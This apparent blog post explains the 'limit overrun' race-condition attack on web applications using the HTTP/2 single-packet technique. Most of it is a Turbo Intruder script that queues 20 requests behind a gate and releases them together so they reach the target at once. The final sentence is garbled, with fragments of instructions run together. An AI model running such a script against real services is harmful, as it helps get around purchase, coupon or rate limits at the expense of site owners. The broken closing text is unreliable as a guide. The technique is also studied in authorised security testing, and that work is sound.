Hack. Eat. Sleep. Repeat!!!
Limit Overrun attack with single packet attack technique.The single-packet attack enables you to completely neutralize interference from network jitter by using a single TCP packet to complete 20-30 requests simultaneously.Single packet is for HTTP/2 while last byte atttack is for HTTP/1.
Exploiting Limit Overrun with Turbo Intruder if the target support HTTP/2-:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)
# queue 20 requests in gate '1'
for i in range(20):
engine.queue(target.req, gate='1')
# send all requests in gate '1' in parallel
engine.openGate('1')
engine to engine=Engine.BURP2 and concurrentConnections=1engine.queue() method.